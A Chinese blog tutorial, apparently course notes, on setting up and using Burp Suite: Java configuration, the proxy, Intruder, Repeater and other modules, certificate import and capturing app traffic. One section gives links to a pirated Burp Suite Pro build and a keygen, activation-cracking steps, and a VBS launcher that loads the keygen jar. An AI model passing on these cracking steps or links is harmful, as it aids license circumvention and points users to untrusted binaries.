



<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#FFF">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon.png">

<link rel="icon" type="image/ico" sizes="32x32" href="/images/favicon.ico">
  <meta http-equiv="Cache-Control" content="no-transform">
  <meta http-equiv="Cache-Control" content="no-siteapp">


<link rel="alternate" type="application/rss+xml" title="Hexo" href="https://sun-spots.github.io/rss.xml" />
<link rel="alternate" type="application/atom+xml" title="Hexo" href="https://sun-spots.github.io/atom.xml" />
<link rel="alternate" type="application/json" title="Hexo" href="https://sun-spots.github.io/feed.json" />

<link rel="stylesheet" href="//fonts.googleapis.com/css?family=Mulish:300,300italic,400,400italic,700,700italic%7CFredericka%20the%20Great:300,300italic,400,400italic,700,700italic%7CNoto%20Serif%20JP:300,300italic,400,400italic,700,700italic%7CNoto%20Serif%20SC:300,300italic,400,400italic,700,700italic%7CInconsolata:300,300italic,400,400italic,700,700italic&display=swap&subset=latin,latin-ext">

<link rel="stylesheet" href="/css/app.css?v=0.2.5">

  

<link rel="canonical" href="https://sun-spots.github.io/2022/03/04/%E4%BF%A1%E6%81%AF%E5%AE%89%E5%85%A8/%E7%AC%AC%E4%BA%8C%E9%98%B6%E6%AE%B5/%E7%AC%AC%E4%B8%80%E5%91%A8/BurpSuite%E4%BD%BF%E7%94%A8/">



  <title>
BurpSuite使用 - 信息安全—网络渗透 |
Yume Shoka = Hexo</title>
<meta name="generator" content="Hexo 6.0.0"></head>
<body itemscope itemtype="http://schema.org/WebPage">
  <div id="loading">
    <div class="cat">
      <div class="body"></div>
      <div class="head">
        <div class="face"></div>
      </div>
      <div class="foot">
        <div class="tummy-end"></div>
        <div class="bottom"></div>
        <div class="legs left"></div>
        <div class="legs right"></div>
      </div>
      <div class="paw">
        <div class="hands left"></div>
        <div class="hands right"></div>
      </div>
    </div>
  </div>
  <div id="container">
    <header id="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="inner">
        <div id="brand">
          <div class="pjax">
          
  <h1 itemprop="name headline">BurpSuite使用
  </h1>
  
<div class="meta">
  <span class="item" title="创建时间：2022-03-04 09:35:01">
    <span class="icon">
      <i class="ic i-calendar"></i>
    </span>
    <span class="text">发表于</span>
    <time itemprop="dateCreated datePublished" datetime="2022-03-04T09:35:01+08:00">2022-03-04</time>
  </span>
</div>


          </div>
        </div>
        <nav id="nav">
  <div class="inner">
    <div class="toggle">
      <div class="lines" aria-label="切换导航栏">
        <span class="line"></span>
        <span class="line"></span>
        <span class="line"></span>
      </div>
    </div>
    <ul class="menu">
      <li class="item title"><a href="/" rel="start">Yume Shoka</a></li>
    </ul>
    <ul class="right">
      <li class="item theme">
        <i class="ic i-sun"></i>
      </li>
      <li class="item search">
        <i class="ic i-search"></i>
      </li>
    </ul>
  </div>
</nav>

      </div>
      <div id="imgs" class="pjax">
        <ul>
          <li class="item" data-background-image="https://tva2.sinaimg.cn/large/6833939bly1gicm07ih54j20zk0m84qp.jpg"></li>
          <li class="item" data-background-image="https://tva2.sinaimg.cn/large/6833939bly1gipet4bz0yj20zk0m8e81.jpg"></li>
          <li class="item" data-background-image="https://tva2.sinaimg.cn/large/6833939bly1giciuja1j1j20zk0m8kjl.jpg"></li>
          <li class="item" data-background-image="https://tva2.sinaimg.cn/large/6833939bly1gicm0n457cj20zk0m8e81.jpg"></li>
          <li class="item" data-background-image="https://tva2.sinaimg.cn/large/6833939bly1giclwrdwyaj20zk0m8are.jpg"></li>
          <li class="item" data-background-image="https://tva2.sinaimg.cn/large/6833939bly1gipeuibk9fj20zk0m8ay2.jpg"></li>
        </ul>
      </div>
    </header>
    <div id="waves">
      <svg class="waves" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" viewBox="0 24 150 28" preserveAspectRatio="none" shape-rendering="auto">
        <defs>
          <path id="gentle-wave" d="M-160 44c30 0 58-18 88-18s 58 18 88 18 58-18 88-18 58 18 88 18 v44h-352z" />
        </defs>
        <g class="parallax">
          <use xlink:href="#gentle-wave" x="48" y="0" />
          <use xlink:href="#gentle-wave" x="48" y="3" />
          <use xlink:href="#gentle-wave" x="48" y="5" />
          <use xlink:href="#gentle-wave" x="48" y="7" />
        </g>
      </svg>
    </div>
    <main>
      <div class="inner">
        <div id="main" class="pjax">
          
  <div class="article wrap">
    
<div class="breadcrumb" itemscope itemtype="https://schema.org/BreadcrumbList">
<i class="ic i-home"></i>
<span><a href="/">首页</a></span><i class="ic i-angle-right"></i>
<span  class="current" itemprop="itemListElement" itemscope itemtype="https://schema.org/ListItem"><a href="/categories/%E4%BF%A1%E6%81%AF%E5%AE%89%E5%85%A8%E2%80%94%E7%BD%91%E7%BB%9C%E6%B8%97%E9%80%8F/" itemprop="item" rel="index" title="分类于 信息安全—网络渗透"><span itemprop="name">信息安全—网络渗透</span></a>
<meta itemprop="position" content="1" /></span>
</div>

    <article itemscope itemtype="http://schema.org/Article" class="post block" lang="zh-CN">
  <link itemprop="mainEntityOfPage" href="https://sun-spots.github.io/2022/03/04/%E4%BF%A1%E6%81%AF%E5%AE%89%E5%85%A8/%E7%AC%AC%E4%BA%8C%E9%98%B6%E6%AE%B5/%E7%AC%AC%E4%B8%80%E5%91%A8/BurpSuite%E4%BD%BF%E7%94%A8/">

  <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
    <meta itemprop="image" content="/images/avatar.jpg">
    <meta itemprop="name" content="John Doe">
    <meta itemprop="description" content=", ">
  </span>

  <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
    <meta itemprop="name" content="Hexo">
  </span>

  <div class="body md" itemprop="articleBody">
    

    <h1 id="第三天burpsuite使用"><a class="markdownIt-Anchor" href="#第三天burpsuite使用">#</a> 第三天：BurpSuite 使用</h1>
<h1 id="img"><a class="markdownIt-Anchor" href="#img">#</a> <img data-src="https://cdn.nlark.com/yuque/0/2021/png/2942226/1625735135940-c0de8bcb-4afa-4471-9f83-22d8e71bead4.png" alt="img"></h1>
<h1 id="环境变量配置"><a class="markdownIt-Anchor" href="#环境变量配置">#</a> 环境变量配置</h1>
<p>由于 BurpSuite 是由 JAVA 编译所以先安装 JAVA 环境</p>
<p><img data-src="https://cdn.nlark.com/yuque/0/2021/png/2942226/1625735304937-1ea9f7e4-abc1-4bbf-9631-a0a6406fe995.png" alt="img"></p>
<p>JAVA 环境安装与配置，双击 jdk.exe 安装 JAVA，打开后点击下一步</p>
<p><img data-src="https://cdn.nlark.com/yuque/0/2021/png/2942226/1625735319539-c2c6b971-693e-43c9-bafd-7b66ebd9a3ef.png" alt="img"></p>
<p>记住安装路径，安装路径默认即可，并点击下一步，等待安装</p>
<p><img data-src="https://cdn.nlark.com/yuque/0/2021/png/2942226/1625735333618-cb1febfa-beab-4a63-a70d-ce10230405d4.png" alt="img"></p>
<p>配置 JAVA 环境，需要配置三个环境变量：</p>
<p>1. 在 &quot;系统变量&quot; 栏，“新建”，“变量名 &quot;为&quot;Java_Home”</p>
<p>&quot;变量值&quot; 为 JDK 安装路径：“C:\Program Files\Java\jdk1.8.0_121”</p>
<p>2. 在 &quot;系统变量&quot; 栏，“新建”，“变量名 &quot;为&quot;CLASSPATH”，</p>
<p>加入：&quot;.;% Java_Home%\bin;% Java_Home%\lib\dt.jar;% Java_Home%\lib\tools.jar&quot;</p>
<p>3. 选中 &quot;Path&quot; 点击 &quot;新建&quot;，&quot;编辑&quot; 选项</p>
<p>加入：&quot;% Java_Home%\bin;% Java_Home%\jre\bin;&quot;</p>
<p>在 CMD 下输入，java、javac、java -version 查看是否配置成功</p>
<h1 id="burp简介及配置"><a class="markdownIt-Anchor" href="#burp简介及配置">#</a> Burp 简介及配置</h1>
<h2 id="burp简介"><a class="markdownIt-Anchor" href="#burp简介">#</a> Burp 简介</h2>
<p>Burp Suite 是一个集成化的渗透测试工具，它集合了多种渗透测试组件，使我们自动化地或手 工地能更好的完成对 web 应用的渗透测试和攻击。在渗透测试中，我们使用 Burp Suite 将使得 测试工作变得更加容易和方便，即使在不需要娴熟的技巧的情况下，只有我们熟悉 Burp Suite 的使用，也使得渗透测试工作变得轻松和高效；</p>
<p>Burp Suite 是由 Java 语言编写而成，而 Java 自身的跨平台性，使得软件的学习和使用更加方 便。Burp Suite 不像其他的自动化测试工具，它需要你手工的去配置一些参数，触发一些自动 化流程，然后它才会开始工作。 Burp Suite 可执行程序是 java 文件类型的 jar 文件，免费版的可以从免费版下载地址进行下载。 免费版的 Burp Suite 会有许多限制，很多的高级工具无法使用，如果您想使用更多的高级功 能，需要付费购买专业版；</p>
<p>专业版与免费版的主要区别有：</p>
<ul>
<li>
<ul>
<li>Burp Scanner 模块</li>
<li>工作空间的保存和恢复</li>
</ul>
</li>
<li>
<ul>
<li>拓展工具，如 Target Analyzer, Content Discovery 和 Task Scheduler</li>
</ul>
</li>
</ul>
<p>burpsuite_pro_v2.1.05 下载地址：<span class="exturl" data-url="aHR0cHM6Ly9wYW4uYmFpZHUuY29tL3MvMUVpWktSS2s1d1BFaW1lSmw3S21XdHclRUYlQkMlOEMlRTYlOEYlOTAlRTUlOEYlOTYlRTclQTAlODElRUYlQkMlOUEyMmxw">https://pan.baidu.com/s/1EiZKRKk5wPEimeJl7KmWtw，提取码：22lp</span></p>
<p>注册机下载：<span class="exturl" data-url="aHR0cHM6Ly9zcWxzZWMubGFuem91eC5jb20vaWNjaDBxaA==">https://sqlsec.lanzoux.com/icch0qh</span></p>
<p>汉化包：<span class="exturl" data-url="aHR0cHM6Ly93d3cubGFuem91eC5jb20vaTc4ZTdiYw==">https://www.lanzoux.com/i78e7bc</span></p>
<h3 id="破解步骤"><a class="markdownIt-Anchor" href="#破解步骤">#</a> 破解步骤</h3>
<p>打开  burp-loader-keygen-2_1_05 运行后单击 run 运行 brupsuite  点击 run，复制 license 内的内容复制到 burpusite 内；</p>
<p><img data-src="https://cdn.nlark.com/yuque/0/2021/png/2336202/1627804173703-bf24487e-4175-4775-9bfb-73550dcb189a.png" alt="img"></p>
<p><img data-src="https://cdn.nlark.com/yuque/0/2021/png/2336202/1627804185354-45ecd620-bb32-4b08-8478-c6982f11db35.png" alt="img"></p>
<p>单击 next  单击 manual activation 将 brpusteie action request 内容复制到注册机生产一个 key 再复制到 brupsuite</p>
<p><img data-src="https://cdn.nlark.com/yuque/0/2021/png/2336202/1627805360801-76092546-4496-4505-b867-cdb3d51ec556.png" alt="img"></p>
<p><img data-src="https://cdn.nlark.com/yuque/0/2021/png/2336202/1627805481264-d6541900-4c10-4ef9-982e-7dbb1cf311ba.png" alt="img"></p>
<p>汉化快捷启动</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">Burp_start_ch.vbs:</span><br><span class="line">		CreateObject(&quot;WScript.Shell&quot;).Run &quot;java -noverify -Dfile.encoding=utf-8 -javaagent:BurpSuiteCn.jar -Xbootclasspath/p:burp-loader-keygen-2_1_05.jar -jar burpsuite_pro_v2.1.05.jar&quot;,0</span><br></pre></td></tr></table></figure>
<p><img data-src="https://cdn.nlark.com/yuque/0/2021/png/2336202/1627797812761-c790528b-ad0d-4d83-8b9c-a6604c0e5acd.png" alt="img"></p>
<h2 id="burp配置"><a class="markdownIt-Anchor" href="#burp配置">#</a> Burp 配置</h2>
<p>工作原理：</p>
<p>Burp Suite 代理工具是以拦截代理的方式，拦截所有通过代理的网络流量，如客户端的请求数 据、服务器端的返回信息等。Burp Suite 主要拦截 http 和 https 协议的流量，通过拦截，Burp Suite 以中间人的方式，可以对客户端请求数据、服务端返回做各种处理，以达到安全评估测 试的目的；</p>
<p>在日常工作中，我们最常用的 web 客户端就是的 web 浏览器，我们可以通过代理的设置，做到 对 web 浏览器的流量拦截，并对经过 Burp Suite 代理的流量数据进行处理；</p>
<p><img data-src="https://cdn.nlark.com/yuque/0/2021/png/2336202/1627636661406-7fb56cba-ea7f-4839-81b5-6e91bfcda3ab.png" alt="img"></p>
<p>配置 burp 默认的代理位置：</p>
<p><img data-src="https://cdn.nlark.com/yuque/0/2021/png/2336202/1627797829244-f79ed14a-2854-4054-ac83-15264e7b6729.png" alt="img"></p>
<p>配置我们浏览器的代理位置：</p>
<p><strong>Chrome 浏览器：</strong></p>
<p><img data-src="https://cdn.nlark.com/yuque/0/2021/png/2336202/1627797847987-60654ad7-c12b-45c3-a52c-0413663f1b72.png" alt="img"></p>
<p><strong>Firefox 浏览器：</strong></p>
<p><img data-src="https://cdn.nlark.com/yuque/0/2021/png/2336202/1627797866255-7aa7cfa3-f03a-4aae-980b-49178ab51276.png" alt="img"></p>
<p>导入证书：</p>
<p><img data-src="https://cdn.nlark.com/yuque/0/2021/png/2336202/1627636772135-7508fb54-2473-4a72-b66a-3f2b674177ab.png" alt="img"></p>
<p><img data-src="https://cdn.nlark.com/yuque/0/2021/png/2336202/1627797935245-aa20bd73-f5fb-4b49-9076-4d69d23fe038.png" alt="img"></p>
<p><img data-src="https://cdn.nlark.com/yuque/0/2021/png/2336202/1627797943959-13299ecd-6401-4ea4-8f45-b7e93cbcdc59.png" alt="img"></p>
<p>Chrome 浏览器同理</p>
<h1 id="burp使用"><a class="markdownIt-Anchor" href="#burp使用">#</a> Burp 使用</h1>
<h2 id="抓包"><a class="markdownIt-Anchor" href="#抓包">#</a> 抓包</h2>
<p>Burp 开启代理，<span class="exturl" data-url="aHR0cDovL3huLS1iYWlkdS1jejFpNDE4a2N2OWJueWQ0NTVhLmNvbQ==">浏览器访问 baidu.com</span></p>
<p><img data-src="https://cdn.nlark.com/yuque/0/2021/png/2336202/1627797983852-80885aa4-5b57-4ef6-9e95-24a3c8f5f78e.png" alt="img"></p>
<h2 id="burp模块介绍"><a class="markdownIt-Anchor" href="#burp模块介绍">#</a> Burp 模块介绍</h2>
<h3 id="仪表盘dashboard"><a class="markdownIt-Anchor" href="#仪表盘dashboard">#</a> 仪表盘 (Dashboard)：</h3>
<p>主要分为三块：Tasks (任务)、Event log (事件日志)、issue activity (动态发现的问题)；</p>
<p><img data-src="https://cdn.nlark.com/yuque/0/2021/png/2336202/1627797994659-b96bd965-d47b-4d8f-8fa2-e9d6b0fbbdf6.png" alt="img"></p>
<h3 id="目标target"><a class="markdownIt-Anchor" href="#目标target">#</a> 目标 (Target)：</h3>
<p>Target 组件主要包含站点地图、目标域、Target 工具三部分组成，他们帮助渗透测试人员更好地了解目标应用的整体状况、当前的工作涉及哪些目标域、分析可能存在的攻击面等信息；</p>
<p><img data-src="https://cdn.nlark.com/yuque/0/2021/png/2336202/1627798006044-2696b695-2afe-4cdb-a8b1-3b12d75b6c59.png" alt="img"></p>
<h4 id="主动扫描active-scanning"><a class="markdownIt-Anchor" href="#主动扫描active-scanning">#</a> 主动扫描（Active Scanning）</h4>
<p>​	当使用主动扫描模式时，Burp 会向应用发送新的请求并通过 payload 验证漏洞。这种模式下的 操作，会产生大量的请求和应答数据，直接影响系统的性能，通常使用在非生产环境；</p>
<p>它对 下列的两类漏洞有很好的扫描效果：</p>
<p>​	1. 客户端的漏洞，像 XSS、Http 头注入、操作重定向；</p>
<p>​	2. 服务端的漏洞，像 SQL 注入、命令行注入、文件遍历；</p>
<p>对于第一类漏洞，Burp 在检测时，会提交一下 input 域，然后根据应答的数据进行解析。在检 测过程中，Burp 会对基础的请求信息进行修改，即根据漏洞的特征对参数进行修改，模拟人 的行为，以达到检测漏洞的目的；</p>
<p>对于第二类漏洞，一般来说检测比较困难，因为是发生在 服务器侧。比如说 SQL 注入，有可能是返回数据库错误提示信息，也有可能是什么也不反 馈。Burp 在检测过程中，采用各个技术来验证漏洞是否存在，比如诱导时间延迟、强制修改 Boolean 值，与模糊测试的结果进行比较，已达到高准确性的漏洞扫描报告；</p>
<h4 id="被动扫描passive-scanning"><a class="markdownIt-Anchor" href="#被动扫描passive-scanning">#</a> 被动扫描（Passive Scanning）</h4>
<p>当使用被动扫描模式时，Burp 不会重新发送新的请求，它只是对已经存在的请求和应答进行分析，这对系统的检测比较安全，尤其在你授权访问的许可下进行的，通常适用于生成环境的检测；</p>
<p>虽然被动扫描模式相比于主动模式有很多的不足，但同时也具有主动模式不具备的优点，除了前文说的对系统的检测在我们授权的范围内比较安全外，当某种业务场景的测试，每测试一次都会导致业务的某方面问题时，我们也可以使用被动扫描模式，去验证问题是否存在， 减少测试的风险；</p>
<h3 id="代理proxy"><a class="markdownIt-Anchor" href="#代理proxy">#</a> 代理 (Proxy)：</h3>
<p>是一个拦截 HTTP/S 的代理服务器，作为一个在浏览器和目标应用程序之间的中间人，允许你拦截，查看，修改在两个方向上的原始数据流；</p>
<p><img data-src="https://cdn.nlark.com/yuque/0/2021/png/2336202/1627798018249-f8a0e6b3-b935-4327-aa21-2173df8e3b2b.png" alt="img"></p>
<p><strong>Action</strong>：说明一个菜单可用的动作行为操作可以有哪些操作功能</p>
<p><img data-src="https://cdn.nlark.com/yuque/0/2021/png/2336202/1627637121178-29c7c1fb-4a10-4546-b938-54566a0789da.png" alt="img"></p>
<h3 id="入侵intruder"><a class="markdownIt-Anchor" href="#入侵intruder">#</a> 入侵 (Intruder)：</h3>
<p>可配置的工具，对 web 应用程序进行自动化攻击。此功能有多种用途，如漏洞利用、Web 应用程序模糊测试、进行暴力破解等；</p>
<p><img data-src="https://cdn.nlark.com/yuque/0/2021/png/2336202/1627798040017-af26baaa-0273-4a99-812b-55c8060b5760.png" alt="img"></p>
<h4 id="常用的应用场景"><a class="markdownIt-Anchor" href="#常用的应用场景">#</a> 常用的应用场景：</h4>
<p><strong>标识符枚举</strong></p>
<p>Web 应用程序经常使用标识符来引用用户、账户、资产等数据信息。例如， 用户名，文件 ID 和账户号码；</p>
<p><strong>提取有用的数据</strong></p>
<p>在某些场景下，而不是简单地识别有效标识符，你需要通过简单标识符提取一些其他的数据。比如说，你想通过用户的个人空间 id，获取所有用户在个人空间标准的昵称和年龄；</p>
<p><strong>模糊测试</strong></p>
<p>很多输入型的漏洞，如 SQL 注入，跨站点脚本和文件路径遍历可以通过请求参数提交各种测试字符串，并分析错误消息和其他异常情况，来对应用程序进行检测。由 于的应用程序的大小和复杂性，手动执行这个测试是一个耗时且繁琐的过程。这样的场景，您可以设置 Payload，通过 BurpIntruder 自动化地对 Web 应用程序进行模糊测试；</p>
<h4 id="positions位置"><a class="markdownIt-Anchor" href="#positions位置">#</a> Positions (位置)：</h4>
<p>可以在这个模块中修改参数，选择攻击类型先使用 Clear 清空参数，然后使用 Add 添加参数 ；</p>
<p><img data-src="https://cdn.nlark.com/yuque/0/2021/png/2336202/1627798064757-0afc284b-3f7a-4acf-a90a-3497f887c020.png" alt="img"></p>
<h4 id="attack-type-攻击类型"><a class="markdownIt-Anchor" href="#attack-type-攻击类型">#</a> Attack type 攻击类型:</h4>
<p>Sniper (狙击手模式): 一个字典，两个参数，先匹配第一个参数，再匹配第二个参数；</p>
<p>Battering ram (攻城锤模式): 一个字典，两个参数，一个字典同时匹配两个参数，同用户名同密码；</p>
<p>Pitchfork (草叉模式): 两个字典，两个参数，两个字典分别匹配两个参数，到短的截至；</p>
<p>Cluster bomb (集束炸弹模式): 两个字典，两个参数，交叉匹配 (使用第一个字典的第一项匹配第一个；</p>
<h3 id="重放repeater"><a class="markdownIt-Anchor" href="#重放repeater">#</a> 重放 (Repeater)：</h3>
<p>手动操作来触发单独的 HTTP 请求，并进行应用程序响应的工具。此功能用于根据不同的情况修改和发送相同的请求并分析，通过调整 Request 的参数，不断尝试，通过 Response 查看状态。从而节省在浏览器中操作的时间；</p>
<p><img data-src="https://cdn.nlark.com/yuque/0/2021/png/2336202/1627798086254-ab5444ce-022f-4b2b-8dd0-69968e769f19.png" alt="img"></p>
<h3 id="序列器sequencer"><a class="markdownIt-Anchor" href="#序列器sequencer">#</a> 序列器 (Sequencer)：</h3>
<p>Sequencer 是一种用于分析数据样本随机性质量的工具。可以用它测试程序的会话令牌 (Session token)、密码重置令牌是否可预测等场景，通过 Sequencer 的数据样本分析，能够很好的降低这些关键数据被伪造的风险；</p>
<p><img data-src="https://cdn.nlark.com/yuque/0/2021/png/2336202/1627798101455-75083e4f-8322-4c5b-8c6b-30cb3f7da6a6.png" alt="img"></p>
<h4 id="live-capture-信息截取"><a class="markdownIt-Anchor" href="#live-capture-信息截取">#</a> Live capture 信息截取：</h4>
<p><img data-src="https://cdn.nlark.com/yuque/0/2021/png/2336202/1627637472016-b8379249-c215-4b69-81e6-319dca5b78d9.png" alt="img"></p>
<p><img data-src="https://cdn.nlark.com/yuque/0/2021/png/2336202/1627637478195-678743a6-024e-40ef-967b-4f384709453d.png" alt="img"></p>
<p><img data-src="https://cdn.nlark.com/yuque/0/2021/png/2336202/1627637480940-79004860-7cd5-45b3-9cbd-e61b97493634.png" alt="img"></p>
<h4 id="manual-load-手动加载"><a class="markdownIt-Anchor" href="#manual-load-手动加载">#</a> Manual load 手动加载：</h4>
<p><img data-src="https://cdn.nlark.com/yuque/0/2021/png/2336202/1627637508314-0b722457-5a99-475e-a878-508f8f68feeb.png" alt="img"></p>
<h3 id="解码器decoder"><a class="markdownIt-Anchor" href="#解码器decoder">#</a> 解码器 (Decoder)：</h3>
<p>解码器是一个进行手动执行或对应用程序数据者智能解码编码的工具。此功能可用于解码数据找回原来的数据形式，或者进行编码和数据加密；</p>
<p><img data-src="https://cdn.nlark.com/yuque/0/2021/png/2336202/1627798152915-280d1a98-7e89-41ee-b6df-e05fdc876ed1.png" alt="img"></p>
<h3 id="对比comparper"><a class="markdownIt-Anchor" href="#对比comparper">#</a> 对比 (Comparper)：</h3>
<p>通常是通过一些相关的请求和响应得到两项数据的一个可视化 “差异”。此功能主要用于执行任意两个请求，响应或任何其他形式的数据之间的比较；</p>
<p><img data-src="https://cdn.nlark.com/yuque/0/2021/png/2336202/1627798189229-f01ba4e4-b1be-495b-afe2-1e58f62f7475.png" alt="img"></p>
<h3 id="扩展extender"><a class="markdownIt-Anchor" href="#扩展extender">#</a> 扩展 (Extender)：</h3>
<p>可以让你加载 Burp Suit 的扩展，使用你自己的或第三方代码来扩展 Burp Suit 的功能；</p>
<p><img data-src="https://cdn.nlark.com/yuque/0/2021/png/2336202/1627798202220-d6a3806f-8acd-437e-a9cc-07c42152aa36.png" alt="img"></p>
<h3 id="全局参数设置project-options"><a class="markdownIt-Anchor" href="#全局参数设置project-options">#</a> 全局参数设置 (project options)：</h3>
<p>在 Burp Suite 中，存在一些粗粒度的设置，这些设置选项，一旦设置了将会对 Burp Suite 的整 体产生效果，这就是 Options 面板。当我们打开 Options 面板即可看到，它是由 Connections、HTTP、SSL、Sessions、Display、Misc 六个选项卡组成；</p>
<ul>
<li>
<ul>
<li>Burp 网络连接设置（Connections）</li>
<li>HTTP 应答消息处理设置（HTTP）</li>
</ul>
</li>
<li>
<ul>
<li>SSL 连接和加密设置（SSL）</li>
<li>会话设置（Sessions）</li>
</ul>
</li>
<li>
<ul>
<li>显示设置（Display）</li>
<li>其它工具设置（Misc）</li>
</ul>
</li>
</ul>
<p><img data-src="https://cdn.nlark.com/yuque/0/2021/png/2336202/1627798210645-07730b25-b57d-448c-89e9-179720e98e9b.png" alt="img"></p>
<h4 id="burp-网络连接设置connections"><a class="markdownIt-Anchor" href="#burp-网络连接设置connections">#</a> Burp 网络连接设置 (Connections) ：</h4>
<p>Connections 选项卡主要用来控制 Burp 如何来处理平台认证、上游代理服务器、Socks 代理、 超时设置、主机名或域名解析以及 Scope 之外的请求六个方面的相关配置；</p>
<p><strong>1，平台认证：</strong></p>
<p><img data-src="https://cdn.nlark.com/yuque/0/2021/png/2336202/1627798232185-1ccab693-e063-4b48-9e9d-f8917d1dfb19.png" alt="img"></p>
<p>这些设置允许你配置 Burp 自动执行到目标 Web 服务器的平台身份验证，不同的主机可以 配置不同的认证方式和证书。目前支持的身份验证类型有：BASIC，NTLMv1，NTLMv2 和 “摘要” 式认证 ( Digest authentication)；</p>
<p>其中域名 和主机名字段只用于 NTLMv1，NTLMv2 身份验证。 在平台身份认证（Platform Authentication）设置的最下方有一个 Checkbox 选项（Prompt for credentials on platform authentication failure），如果此项选中，则表示当遇到身份验证失败时，Burp 会显示一 个交互式的弹窗，提示验证失败的信息；</p>
<p><img data-src="https://cdn.nlark.com/yuque/0/2021/png/2336202/1627798268014-d67e1afc-8711-4baa-8dab-7ebb1f9943c0.png" alt="img"></p>
<p><strong>2，上游代理服务器（Upstream Proxy Servers）：</strong></p>
<p>我们可以配置多个匹配规则。当我们配置了多个规则时，可以针对不同的目标主机或主机组指定不同的 代理服务器设置。这些规则将按照顺序，并将与目标 Web 服务器相匹配的第一个规则作 为生效规则。如果列表没有规则匹配，Burp 默认采取直连、非代理的方式进行连接；</p>
<p><img data-src="https://cdn.nlark.com/yuque/0/2021/png/2336202/1627798311949-3c655e2a-909b-4661-bf1a-3a9f8ae5f347.png" alt="img"></p>
<p><strong>3，Socks 代理：</strong></p>
<p>这些设置允许我们配置 Burp 使用 SOCKS 代理的方式进行所有传出的通信，但此设置只在 TCP 层生效，所有出站请求将通过这个代理发送。如果我们同时设置了已游 HTTP 代理服 务器配置的规则，则请求上游代理将通过这里配置的 SOCKS 代理发送。其请求的匹配路 径依次是：本地–&gt; 上游代理–&gt;SOCKS 代理。 在使用 SOCKS 代理时，我们需要勾选 【Use SOCKS proxy】，并提供代理的 ip 或者主机名、端口、认证的用户名和口令（如 上图所示）。 如果我们勾选了【Do DNS lookups over SOCKS proxy】，则进行域名解 析时，将通过 SOCKS 代理去查询，而不会使用本地缓存；</p>
<p><img data-src="https://cdn.nlark.com/yuque/0/2021/png/2336202/1627798324223-734d3304-7816-4f89-820c-7e47479d20e0.png" alt="img"></p>
<p><strong>4，超时设置：</strong></p>
<p>这些设置主要用于指定 Burp 各种网络任务的超时；</p>
<p><img data-src="https://cdn.nlark.com/yuque/0/2021/png/2336202/1627637997110-39b3611a-b842-4881-a63e-dd0ccb5c87ed.png" alt="img"></p>
<p><strong>5，主机名解析：</strong></p>
<p>此项配置比较简单，通过这些设置，我们可以指定主机名映射到 IP 地址，来覆盖本地计算机 提供的 DNS 解析。每个主机名解析规则需要指定主机名，并与主机名相关联的 IP 地址。同时，每一个规则可以单独启用或禁用来控制其是否生效；</p>
<p><img data-src="https://cdn.nlark.com/yuque/0/2021/png/2336202/1627638043514-59116523-c4aa-445f-8925-512fbb369cc4.png" alt="img"></p>
<h3 id="用户的设置user-options"><a class="markdownIt-Anchor" href="#用户的设置user-options">#</a> 用户的设置 (user options)</h3>
<p>这页的 connections 和前面的全局设置一样，就不再详细写了；</p>
<p>Ps：一般我们没有特殊需求的话，上游代理和 socks 代理都可以在这个页面设置；</p>
<p><img data-src="https://cdn.nlark.com/yuque/0/2021/png/2336202/1627798356274-aa98fade-9d70-43bf-a250-b9b6e834c464.png" alt="img"></p>
<h4 id="display"><a class="markdownIt-Anchor" href="#display">#</a> display：</h4>
<p>有时候我们的页面显示会有 bug (字体重叠，光标定位不准确)，遇到这种情况，一般在这个页面设置字体大小，字体就可以修复了；</p>
<p><img data-src="https://cdn.nlark.com/yuque/0/2021/png/2336202/1627798369928-71d5ce15-bf68-4a0a-bc65-7535c6b0296e.png" alt="img"></p>
<h1 id="抓app包"><a class="markdownIt-Anchor" href="#抓app包">#</a> 抓 APP 包</h1>
<h4 id="burp设置"><a class="markdownIt-Anchor" href="#burp设置">#</a> burp 设置</h4>
<p>添加一个自己本机 ip 的代理监听器</p>
<p><img data-src="https://cdn.nlark.com/yuque/0/2021/png/2336202/1627796789032-5f954583-4b6a-4ba3-b5d5-3f5bc746f4c9.png" alt="img"></p>
<h4 id="模拟器设置"><a class="markdownIt-Anchor" href="#模拟器设置">#</a> 模拟器设置</h4>
<p>模拟器内设置修改 wifi 的网络代理设置，设置 ip 为 burp 内设置的 ip，端口为设置的端口</p>
<p><img data-src="https://cdn.nlark.com/yuque/0/2021/png/2336202/1627796906821-3648da62-6e17-48c4-9d77-7d0c4152f8f4.png" alt="img"></p>
<p>浏览器访问 http://burp，下载 CA 证书，方便抓 https 的包</p>
<p><img data-src="https://cdn.nlark.com/yuque/0/2021/png/2336202/1627796990780-6838f701-78ff-4646-94c5-ee3b5e3d591f.png" alt="img"></p>
<p>找到下载的证书位置，修改尾缀为 cer</p>
<p><img data-src="https://cdn.nlark.com/yuque/0/2021/png/2336202/1627797546176-748c397c-e542-4dcf-b6e3-8bd24504f669.png" alt="img"></p>
<p>在设置–安全–从 SD 卡安装，安装证书</p>
<p><img data-src="https://cdn.nlark.com/yuque/0/2021/png/2336202/1627797599053-2dd290e1-3b95-4e95-a9d9-1f10dba53c2d.png" alt="img"></p>
<p>burp 开启抓包尝试抓包</p>
<p><img data-src="https://cdn.nlark.com/yuque/0/2021/png/2336202/1627797686636-d2954af2-163a-4a22-9da5-86d171306884.png" alt="img"></p>
<h1 id="bp设置socks5代理访问内网"><a class="markdownIt-Anchor" href="#bp设置socks5代理访问内网">#</a> BP 设置 socks5 代理访问内网</h1>
<h3 id="环境"><a class="markdownIt-Anchor" href="#环境">#</a> 环境</h3>
